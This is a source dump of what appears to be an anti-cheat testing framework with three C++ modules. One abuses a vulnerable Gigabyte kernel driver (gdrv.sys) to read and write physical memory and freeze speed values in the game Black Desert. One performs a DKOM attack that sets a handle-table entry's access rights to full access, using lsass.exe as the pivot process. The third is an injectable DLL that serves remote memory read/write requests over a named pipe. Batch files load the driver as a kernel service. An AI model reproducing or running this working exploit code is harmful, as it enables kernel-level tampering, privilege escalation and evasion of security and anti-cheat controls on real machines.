230 | 231 | bool activate = true; 232 | 233 | // From this part you will need to customize everything 234 | // This is just a practical example to show how it is possible to validate if the 235 | // memory of a game is accessible with this technique 236 | uintptr_t localPlayerOffset = 0x390d858; 237 | uintptr_t speedAddressOffset = 0xB58; 238 | uintptr_t attackSpeedAddressOffset = 0xB5C; 239 | uintptr_t speedAddress = 0; 240 | uintptr_t attackSpeedAddress = 0; 241 | uintptr_t playerAddress = 0; 242 | 243 | playerAddress = DriverHelper::pBaseAddressTargetProcess + localPlayerOffset; 244 | 245 | uintptr_t pLocalPlayer = 0; 246 | 247 | std::cout << "[+] Locating localPlayer Address" << std::endl; 248 | if (!DriverHelper::ReadVirtualMemory(DriverHelper::DTBTargetProcess, 249 | playerAddress, 250 | &pLocalPlayer, sizeof(pLocalPlayer), NULL)) 251 | { 252 | std::cout << "[-] Obtaining localPlayer: Failed" << std::endl; 253 | return false; 254 | } 255 | // NOTE(review): the failure path above returns false (exit code 0); the other failure paths in main return 1. 256 | std::cout << "\t[+] localPlayerAddress: 0x" << std::hex << playerAddress << std::endl; 257 | 258 | speedAddress = pLocalPlayer + speedAddressOffset; 259 | attackSpeedAddress = pLocalPlayer + attackSpeedAddressOffset; 260 | 261 | int32_t initialSpeed = 0; 262 | int32_t initialAttackSpeed = 0; 263 | 264 | // Activating Cheat 265 | if (!ActivateHack(speedAddress, attackSpeedAddress, activate, initialSpeed, initialAttackSpeed)) 266 | return 1; 267 | 268 | // We need this while to lock the value we want on memory. The game could change the value anytime 269 | // and we have to overwrite it. 
270 | while (true) 271 | { 272 | // InsertKey to disable cheat 273 | if (GetKeyState(VK_INSERT) & 0x8000) 274 | break; 275 | 276 | if (!ActivateHack(speedAddress, attackSpeedAddress, activate, initialSpeed, initialAttackSpeed)) 277 | return 1; 278 | 279 | Sleep(100); 280 | } 281 | 282 | // Deactivating cheat 283 | activate = false; 284 | if (!ActivateHack(speedAddress, attackSpeedAddress, activate, initialSpeed, initialAttackSpeed)) 285 | return 1; 286 | 287 | return 0; 288 | 289 | } -------------------------------------------------------------------------------- /ExternalCheatDriver/HandleElevationDriver.vcxproj.filters: -------------------------------------------------------------------------------- 1 | ﻿ 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /ExternalCheatDriver/LoadDriver.bat: -------------------------------------------------------------------------------- 1 | sc create Gigabyte binpath= "E:\Recon2019\AntiCheat-Testing-Framework\resources\gdrv.sys" type= kernel 2 | sc start Gigabyte -------------------------------------------------------------------------------- /ExternalCheatDriver/Readme.md: -------------------------------------------------------------------------------- 1 | # External Cheat Driver 2 | 3 | ## Introduction 4 | 5 | Implementation that abuse of a vulnerable driver to Read/Write from physical memory in order to directly read/modify the target process. 
6 | The main purpose is to avoid performing a DKOM, which would be much easier to detect. 7 | This implementation uses the Gigabyte driver to achieve its goal; however, changing the vulnerable driver should be quite easy, given that all the methods are created in a modular way inside DriverHelper. 8 | 9 | ## Usage 10 | 11 | This module makes use of **DriverHelper** and **CheatHelper**. 12 | 13 | > Note that this module has been created as a PoC to manipulate one particular game (BlackDesertOnline); however, the method `ActivateHack` can be modified in order to create any desired PoC. 14 | 15 | 16 | ## Configuration 17 | 18 | This module requires configuration: 19 | 20 | - The following variables in config.ini need to be provided: 21 | 22 | [Strings] 23 | ``` 24 | targetProc=BlackDesert64.exe 25 | driverName=\\.\GIO 26 | ``` 27 | 28 | ## Notes 29 | 30 | - driverName: Name of the driver device to exploit 31 | - targetProc: Process name of the game 32 | 33 | -------------------------------------------------------------------------------- /ExternalCheatDriver/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /ExternalCheatDriver/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. 
Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /HandleElevationDriver/HandleElevationDriver.cpp: -------------------------------------------------------------------------------- 1 | // HandleElevationDriver.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | // Review summary: test program that looks up one handle-table entry through DriverHelper routines and the GIO_* IOCTL wrappers below, then overwrites the entry's GrantedAccess field. 4 | #include "pch.h" 5 | #include 6 | #include "CheatHelper.h" 7 | #include "DriverHelper.h" 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | 14 | // NOTE(review): the OFFSET_* values below are defined but not referenced in this file. 15 | // Definition of IOCTL numbers 16 | // GPCIDrv64 Driver 17 | #define IOCTL_MAPPHYSICAL 0x9C402580 18 | #define IOCTL_UNMAPPHYSICAL 0x9C402584 19 | // GIO Driver 20 | #define IOCTL_GIO_MAPPHYSICAL 0xC3502004 21 | #define IOCTL_GIO_UNMAPPHYSICAL 0xC3502008 22 | #define IOCTL_GIO_MEMCPY 0xC3502808 23 | 24 | // Kernel offsets 25 | // W10 26 | #define OFFSET_IMAGEFILENAME 0x450 27 | #define OFFSET_OBJECTTABLE 0x418 28 | 29 | #pragma comment(lib, "ntdll.lib") 30 | 31 | // Issues IOCTL_GIO_MAPPHYSICAL for the given physical address and size and returns outbuffer[0]. The DeviceIoControl result is not checked, so after a failed call the function returns whatever is in the zero-initialised buffer. 32 | ULONG64 GIO_mapPhysical(ULONG64 physicaladdress, DWORD size) 33 | { 34 | READ_REQUEST inbuffer = { 0, 0, physicaladdress, 0, size }; 35 | ULONG64 outbuffer[2] = { 0 }; 36 | DWORD bytes_returned = 0; 37 | DeviceIoControl(DriverHelper::hDeviceDrv, 38 | IOCTL_GIO_MAPPHYSICAL, 39 | &inbuffer, 40 | sizeof(inbuffer), 41 | &outbuffer, 42 | sizeof(outbuffer), 43 | &bytes_returned, 44 | (LPOVERLAPPED)NULL); 45 | 46 | return outbuffer[0]; 47 | } 48 | // Issues IOCTL_GIO_UNMAPPHYSICAL for the given address and returns outbuffer[0]; the DeviceIoControl result is likewise not checked. 49 | ULONG64 GIO_unmapPhysical(ULONG64 address) 50 | { 51 | ULONG64 inbuffer = address; 52 | ULONG64 outbuffer[2] = { 0 }; 53 | DWORD bytes_returned = 0; 54 | DeviceIoControl(DriverHelper::hDeviceDrv, 55 | 
IOCTL_GIO_UNMAPPHYSICAL, 56 | (LPVOID)&inbuffer, 57 | sizeof(inbuffer), 58 | (LPVOID)outbuffer, 59 | sizeof(outbuffer), 60 | &bytes_returned, 61 | (LPOVERLAPPED)NULL); 62 | 63 | return outbuffer[0]; 64 | } 65 | // Issues IOCTL_GIO_MEMCPY with {dest, src, size}; returns TRUE only when the call reported a non-zero byte count, and ignores DeviceIoControl's own BOOL result. 66 | BOOL GIO_memcpy(ULONG64 dest, ULONG64 src, DWORD size) 67 | { 68 | MEMCPY_REQUEST mystructIn = { dest, src, size }; 69 | BYTE outbuffer[0x30] = { 0 }; 70 | DWORD returned = 0; 71 | 72 | DeviceIoControl(DriverHelper::hDeviceDrv, IOCTL_GIO_MEMCPY, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); 73 | if (returned) { 74 | return TRUE; 75 | } 76 | return FALSE; 77 | } 78 | 79 | 80 | // GPCIDrv64 variants of the map/unmap wrappers. NOTE(review): main installs only the GIO_* functions, so these two are not used in this file. 81 | ULONG64 GPCI_mapPhysical(DWORDLONG physicaladdress, DWORD size) 82 | { 83 | READ_REQUEST inbuffer = { physicaladdress, size }; 84 | ULONG64 outbuffer[2] = {0}; 85 | DWORD bytes_returned = 0; 86 | DeviceIoControl(DriverHelper::hDeviceDrv, 87 | IOCTL_MAPPHYSICAL, 88 | &inbuffer, 89 | sizeof(inbuffer), 90 | &outbuffer, 91 | sizeof(outbuffer), 92 | &bytes_returned, 93 | (LPOVERLAPPED)NULL); 94 | 95 | return outbuffer[0]; 96 | } 97 | 98 | ULONG64 GPCI_unmapPhysical(ULONG64 address) 99 | { 100 | ULONG64 inbuffer = address; 101 | ULONG64 outbuffer[2] = { 0 }; 102 | DWORD bytes_returned = 0; 103 | 104 | DeviceIoControl(DriverHelper::hDeviceDrv, 105 | IOCTL_UNMAPPHYSICAL, 106 | (LPVOID)&inbuffer, 107 | sizeof(inbuffer), 108 | (LPVOID)outbuffer, 109 | sizeof(outbuffer), 110 | &bytes_returned, 111 | (LPOVERLAPPED)NULL); 112 | 113 | return outbuffer[0]; 114 | } 115 | // Pattern passed to findPhisical_ObjectTable in main; the process name is hard-coded here. 116 | _EPROCESS_PATTERN pivotProcess = { "lsass.exe", 0x2 }; 117 | PBYTE ppivotProcess = NULL; 118 | // NOTE(review): the global ppivotProcess above is shadowed by a local of the same name in main and is never assigned. 119 | // Entry point: see the review summary at the top of the file; returns 1 only when the device handle cannot be obtained. 120 | int main() 121 | { 122 | std::cout << "[+] Init" << std::endl; 123 | CheatHelper::loadConfig(); 124 | 125 | 126 | // Connecting the vulnerable driver (GPCIDrv64.sys AORUS GRAPHICS ENGINE v1.25) 127 | std::cout << "[+] Obtaining HANDLE to Drv" << std::endl; 128 | if (DriverHelper::getDeviceHandle(CheatHelper::driverName)) 129 | { 130 | return 1; 131 | } 132 | 133 | 
// If we want to change the driver, we just need to create our functions for communication and set the following variables 134 | DriverHelper::fn_memcpy = (_fn_memcpy)GIO_memcpy; 135 | DriverHelper::fn_mapPhysical = (_fn_mapPhysical)GIO_mapPhysical; 136 | DriverHelper::fn_unmapPhysical = (_fn_unmapPhysical)GIO_unmapPhysical; 137 | 138 | DWORDLONG stopAddress = _UI64_MAX; 139 | DWORD searchSpace = 0x00001000; 140 | 141 | PBYTE ppivotProcess = (PBYTE)malloc(sizeof(_EPROCESS_PATTERN)); 142 | memcpy(ppivotProcess, &pivotProcess, sizeof(_EPROCESS_PATTERN)); 143 | // NOTE(review): none of the three malloc results in main is checked or freed, and the entryAddr allocation is replaced by the lookup result a few lines later. 144 | 145 | ULONG64 objectTable = DriverHelper::findPhisical_ObjectTable(CheatHelper::startAddressPhy, stopAddress, searchSpace, ppivotProcess, sizeof(_EPROCESS_PATTERN)); 146 | Sleep(1000); 147 | void** pObjectTable = (void**)objectTable; 148 | 149 | PBYTE pHandleTable = (PBYTE)malloc(sizeof(_HANDLE_TABLE)); 150 | DriverHelper::fn_memcpy((ULONG64)pHandleTable, (ULONG64)*pObjectTable, sizeof(_HANDLE_TABLE)); 151 | 152 | ULONG64 entryAddr = (ULONG64)malloc(sizeof(_HANDLE_TABLE_ENTRY)); 153 | 154 | //TODO: add offsets and test in W7 155 | entryAddr = DriverHelper::ExpLookupHandleTableEntryW10((ULONGLONG)pHandleTable, (ULONGLONG)CheatHelper::requestHandleDrv); 156 | 157 | HANDLE_TABLE_ENTRY entry; 158 | DriverHelper::fn_memcpy((ULONG64)&entry, entryAddr, sizeof(_HANDLE_TABLE_ENTRY)); 159 | 160 | Sleep(1000); 161 | std::cout << "[+] GrantedAccess original: " << std::hex << entry.GrantedAccess << std::endl; 162 | entry.GrantedAccess = 0x1FFFFF; 163 | // NOTE(review): the Readme describes this value as PROCESS_ALL_ACCESS. The write below modifies an existing handle-table entry rather than opening a handle, so a control that inspects access rights only when a handle is created would presumably not observe it; re-checking the granted access of existing handles is the relevant defensive measure. 164 | DriverHelper::fn_memcpy(entryAddr + sizeof(ULONGLONG), (ULONG64)&entry + sizeof(ULONGLONG), sizeof(_HANDLE_TABLE_ENTRY) - sizeof(+sizeof(ULONGLONG))); 165 | std::cout << "[+] GrantedAccess overwritten" << std::endl; 166 | return 0; 167 | 168 | } -------------------------------------------------------------------------------- /HandleElevationDriver/HandleElevationDriver.vcxproj: -------------------------------------------------------------------------------- 1 | 2 
| 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {97D0792B-4385-450B-9E85-79494037D730} 24 | Win32Proj 25 | HandleElevationDriver 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | MultiByte 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | NotUsing 88 | Level3 89 | Disabled 90 | true 91 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | $(SolutionDir)CheatHelper;$(SolutionDir)DriverHelper;%(AdditionalIncludeDirectories) 95 | 96 | 97 | Console 98 | true 99 | $(SolutionDir)x64\Debug;%(AdditionalLibraryDirectories) 100 | %(AdditionalDependencies) 101 | 102 | 103 | 104 | 105 | Use 106 | Level3 107 | Disabled 108 | true 109 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 110 | true 111 | pch.h 112 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 113 | 114 | 115 | Console 116 | true 117 | 118 | 119 | 120 | 121 | Use 122 | Level3 123 | MaxSpeed 124 | true 125 | true 126 | true 127 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 128 | true 129 | pch.h 130 | 131 | 132 | Console 133 | true 134 | true 135 | true 136 | 137 | 138 | 139 | 140 | NotUsing 141 | Level3 142 | MaxSpeed 143 | true 144 | true 145 | true 146 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 147 | true 148 | pch.h 149 | $(SolutionDir)CheatHelper;$(SolutionDir)DriverHelper;%(AdditionalIncludeDirectories) 150 | 151 | 152 | Console 153 | true 154 | true 155 | true 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | Create 165 | Create 166 | Create 167 | Create 168 | 169 | 170 | 171 | 
172 | {a080c117-d1db-4671-8217-65496573ba4d} 173 | 174 | 175 | {36244ba2-d910-4746-8ed2-7cfa55fb4de9} 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | -------------------------------------------------------------------------------- /HandleElevationDriver/HandleElevationDriver.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /HandleElevationDriver/LoadDriver.bat: -------------------------------------------------------------------------------- 1 | sc create Gigabyte binpath= "F:\Recon2019\AntiCheat-Testing-Framework\resources\gdrv.sys" type= kernel 2 | sc start Gigabyte -------------------------------------------------------------------------------- /HandleElevationDriver/Readme.md: -------------------------------------------------------------------------------- 1 | # Handle Elevation Driver 2 | 3 | ## Introduction 4 | 5 | Implementation that abuse of a vulnerable driver to Read/Write from physical memory in order to perform a **DKOM** attack. The module will locate the target handle from an specific process and elevate the GrantedAccess to get PROCESS_ALL_ACCESS. 6 | The main purpose is to elevate a HANDLE so we don't need to create a new one. 
7 | This implementation uses the Gigabyte driver to achieve its goal; however, changing the vulnerable driver should be quite easy, given that all the methods are created in a modular way inside DriverHelper. 8 | 9 | ## Usage 10 | 11 | This module makes use of **DriverHelper** and **CheatHelper**. 12 | HandleHijackingMaster will create a NamedPipe that the DLL will use to receive instructions and then return information to the master (where all the bot logic should be located). 13 | 14 | ## Configuration 15 | 16 | This module requires configuration: 17 | 18 | - The following variables in config.ini need to be provided: 19 | 20 | [Addresses] 21 | ``` 22 | startAddressPhyHigh=0x00000000 23 | startAddressPhyLow=0x58A60000 24 | startAddressPhy=0x0 25 | ``` 26 | 27 | [Handles] 28 | ``` 29 | requestHandleDrv=0x15FC 30 | ``` 31 | 32 | [Strings] 33 | ``` 34 | privotProc=lsass.exe 35 | driverName=\\.\GIO 36 | ``` 37 | 38 | 39 | ## Notes 40 | 41 | - startPhysicalAddress: Physical memory address at which to start looking for EPROCESS structures. 42 | - driverName: Name of the driver device to exploit 43 | - requestHandleDrv: HANDLE number to elevate and use as pivot 44 | 45 | -------------------------------------------------------------------------------- /HandleElevationDriver/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /HandleElevationDriver/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. 
Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /HandleHijackingDLL/HandleHijackingDLL.cpp: -------------------------------------------------------------------------------- 1 | // HandleHijackingDLL.cpp : Defines the exported functions for the DLL application. 2 | // 3 | // Review summary: once loaded, this DLL connects to a named pipe, reads request structs from it and performs the requested memory read/write calls with the handle value, address and size supplied in each request. 4 | #include "stdafx.h" 5 | #include "CheatHelper.h" 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | // The fixed pipe name below is an observable artefact of this test module as shipped. 13 | // EDIT if you modified the original name 14 | char tmp[] = "\\\\.\\pipe\\driverbypass"; 15 | 16 | // Pipe handle and the request/response structs shared by all functions in this file. 17 | HANDLE hNamedPipe; 18 | PipeMessageRequest PMRequest; 19 | PipeMessageResponse PMResponse; 20 | // Opens the pipe once with CreateFile and always returns 0. NOTE(review): the loop never calls CreateFile again, so after a failed open it keeps logging the error without retrying. 21 | int ConnectPipe(LPTSTR name) 22 | { 23 | 24 | hNamedPipe = CreateFile(name, GENERIC_READ | GENERIC_WRITE, 25 | 0, NULL, OPEN_EXISTING, 0, NULL); 26 | 27 | while (1) 28 | { 29 | if (hNamedPipe != INVALID_HANDLE_VALUE) 30 | { 31 | std::cout << "[+] Connected." 
<< std::endl; 32 | break; 33 | } 34 | else 35 | { 36 | std::cout << "[-] Couldn't connect: " << std::dec << GetLastError() << std::endl; 37 | continue; 38 | } 39 | } 40 | return 0; 41 | } 42 | // Logs the response and writes the whole struct to the pipe; returns 1 on success and 0 on failure. 43 | int WritePipe(struct PipeMessageResponse response) 44 | { 45 | 46 | BOOL bWrite; 47 | DWORD dwWritten; 48 | //const char *buffer = "Ready"; 49 | std::cout << "[+] Sending Msg: " << std::endl; 50 | std::cout << "\t[+] status: " << response.status << std::endl; 51 | std::cout << "\t[+] bytesRead: " << response.bytesRead << std::endl; 52 | std::cout << "\t[+] buffer: "; 53 | CheatHelper::PrintBytes((PVOID)response.buffer, response.bytesRead); 54 | bWrite = WriteFile(hNamedPipe, &response, sizeof(PipeMessageResponse), &dwWritten, NULL); 55 | if (!bWrite) 56 | { 57 | std::cout << "[-] Failed writing: " << std::dec << GetLastError() << std::endl; 58 | return 0; 59 | } 60 | else 61 | { 62 | std::cout << "\t[+] Success writing." << std::endl; 63 | return 1; 64 | } 65 | 66 | } 67 | 68 | // Reads one PipeMessageRequest into the global PMRequest; returns 1 on success and 0 on failure. NOTE(review): PMRequest.size comes from the pipe peer and is passed to PrintBytes with no bound check visible here. 69 | int ReadPipe() { 70 | //HANDLE hHeap = GetProcessHeap(); 71 | //void* message = HeapAlloc(hHeap, 0, BUFSIZE); 72 | //message = HeapAlloc(hHeap, 0, BUFSIZE); 73 | DWORD dwRead; 74 | BOOL bRead; 75 | std::cout << "[+] Waiting for message. 
" << std::endl; 76 | 77 | bRead = ReadFile(hNamedPipe, &PMRequest, sizeof(PipeMessageRequest), &dwRead, NULL); 78 | 79 | if (!bRead) 80 | { 81 | std::cout << "[-] Failed reading Pipe: " << std::dec << GetLastError() << std::endl; 82 | return 0; 83 | } 84 | else 85 | { 86 | std::cout << "\t[+] action: " << PMRequest.action << std::endl; 87 | std::cout << "\t[+] handle: 0x" << PMRequest.handle << std::endl; 88 | std::cout << "\t[+] address: 0x" << PMRequest.address << std::endl; 89 | std::cout << "\t[+] size: " << PMRequest.size << std::endl; 90 | std::cout << "\t[+] buffer: "; 91 | CheatHelper::PrintBytes((PVOID)PMRequest.buffer, PMRequest.size); 92 | return 1; 93 | } 94 | } 95 | // Dispatches on PMRequest.action: 1/2 call RPM/WPM, 4/5 call NtRVM/NtWVM, 6/7 call ZwRVM/ZwWVM; each sets PMResponse.status to 0 on success and 1 on failure and returns the same value. The handle, address and size are used exactly as received. 96 | // NOTE(review): cases 0 and 3 only print and break, so they reach the end of this int function without a return statement. 97 | int handleAction() 98 | { 99 | switch (PMRequest.action) { 100 | case 0: //Ping 101 | { 102 | std::cout << '0' << std::endl; 103 | break; 104 | } 105 | case 1: //RPM 106 | { 107 | std::cout << '1' << std::endl; 108 | SIZE_T stRead = 0; 109 | 110 | int status = CheatHelper::RPM((HANDLE)PMRequest.handle, (LPCVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, &PMResponse.bytesRead); 111 | 112 | if (status == 0)//SUCCESS 113 | { 114 | PMResponse.status = 0; 115 | return 0; 116 | } 117 | 118 | PMResponse.status = 1; 119 | return 1; 120 | } 121 | case 2: //WPM 122 | { 123 | std::cout << '2' << std::endl; 124 | SIZE_T stWrite = 0; 125 | 126 | int status = CheatHelper::WPM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, &stWrite); 127 | 128 | if (status == 0) //SUCCESS 129 | { 130 | PMResponse.status = 0; 131 | return 0; 132 | } 133 | 134 | PMResponse.status = 1; 135 | return 1; 136 | } 137 | case 3: //CreatRemoteThread 138 | { 139 | std::cout << '3' << std::endl; 140 | break; 141 | } 142 | case 4: //NtReadVirtualMemory 143 | { 144 | std::cout << '4' << std::endl; 145 | 146 | auto status = CheatHelper::NtRVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, (PULONG)&PMResponse.bytesRead); 147 | 148 | if 
(status == 0) 149 | { 150 | PMResponse.status = 0; 151 | return 0; 152 | } 153 | 154 | PMResponse.status = 1; 155 | return 1; 156 | 157 | } 158 | case 5: //NtWriteVirtualMemory 159 | { 160 | std::cout << '5' << std::endl; 161 | SIZE_T stWrite = 0; 162 | 163 | int status = CheatHelper::NtWVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, (PULONG)&stWrite); 164 | if (status == 0) 165 | { 166 | PMResponse.status = 0; 167 | return 0; 168 | } 169 | 170 | PMResponse.status = 1; 171 | return 1; 172 | } 173 | case 6: //ZwReadVirtualMemory 174 | { 175 | std::cout << '6' << std::endl; 176 | 177 | auto status = CheatHelper::ZwRVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, (PULONG)&PMResponse.bytesRead); 178 | 179 | if (status == 0) 180 | { 181 | PMResponse.status = 0; 182 | return 0; 183 | } 184 | 185 | PMResponse.status = 1; 186 | return 1; 187 | 188 | } 189 | case 7: //ZwWriteVirtualMemory 190 | { 191 | std::cout << '7' << std::endl; 192 | SIZE_T stWrite = 0; 193 | 194 | int status = CheatHelper::ZwWVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, (PULONG)&stWrite); 195 | if (status == 0) 196 | { 197 | PMResponse.status = 0; 198 | return 0; 199 | } 200 | 201 | PMResponse.status = 1; 202 | return 1; 203 | } 204 | default: 205 | { 206 | std::cout << "Default" << std::endl; 207 | return 1; 208 | } 209 | } 210 | } 211 | 212 | 213 | 214 | // Thread routine started from DllMain: connects to the pipe, sends an initial response with status 1, then serves requests until one with action 7 has been handled. 215 | int main() { 216 | 217 | // UNCOMMENT IF: We need to delay the connection to the Master. 
218 | //Sleep(300000); 219 | 220 | strncpy_s(CheatHelper::namedPipeName, tmp, _countof(tmp)); 221 | 222 | CheatHelper::ConsoleSetup("Client"); 223 | 224 | ConnectPipe(CheatHelper::namedPipeName); 225 | 226 | 227 | PMResponse.status = 1; 228 | 229 | WritePipe(PMResponse); 230 | 231 | while (1) 232 | { 233 | ReadPipe(); 234 | // NOTE(review): ReadPipe's return value is ignored, so after a failed read the previous contents of PMRequest are processed again. 235 | 236 | //int handle = 0xBF8; 237 | //LPVOID buffer; 238 | //TODO: Add loop and reconnection 239 | int success = handleAction(); 240 | 241 | 242 | WritePipe(PMResponse); 243 | 244 | // if it is the last possible action -> break 245 | if (PMRequest.action == 7) 246 | { 247 | break; 248 | } 249 | 250 | } 251 | 252 | 253 | 254 | 255 | } 256 | 257 | // On process attach, disables thread attach/detach notifications and starts main() on a new thread. The DLL_PROCESS_ATTACH case has no break of its own and falls through to the shared break below. 258 | BOOL APIENTRY DllMain(HMODULE hModule, 259 | DWORD ul_reason_for_call, 260 | LPVOID lpReserved 261 | ) 262 | { 263 | switch (ul_reason_for_call) 264 | { 265 | case DLL_PROCESS_ATTACH: 266 | { 267 | DisableThreadLibraryCalls(hModule); 268 | CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)main, NULL, NULL, NULL); 269 | } 270 | case DLL_THREAD_ATTACH: 271 | case DLL_THREAD_DETACH: 272 | case DLL_PROCESS_DETACH: 273 | break; 274 | } 275 | return TRUE; 276 | } 277 | 278 | 279 | 280 | -------------------------------------------------------------------------------- /HandleHijackingDLL/HandleHijackingDLL.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {FA4A27D2-1F04-4DDA-A10C-D19640522328} 24 | Win32Proj 25 | HandleHijackingDLL 26 | 10.0.17763.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v141 46 | MultiByte 47 | 48 | 49 | DynamicLibrary 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 
70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | NotUsing 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;HANDLEHIJACKINGDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 92 | true 93 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 94 | 95 | 96 | Windows 97 | true 98 | 99 | 100 | 101 | 102 | NotUsing 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;HANDLEHIJACKINGDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 107 | true 108 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 109 | 110 | 111 | Windows 112 | true 113 | %(AdditionalDependencies) 114 | C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.16.27023\lib\onecore\x64 115 | 116 | 117 | 118 | 119 | Use 120 | Level3 121 | MaxSpeed 122 | true 123 | true 124 | true 125 | WIN32;NDEBUG;HANDLEHIJACKINGDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 126 | true 127 | 128 | 129 | Windows 130 | true 131 | true 132 | true 133 | 134 | 135 | 136 | 137 | NotUsing 138 | Level3 139 | 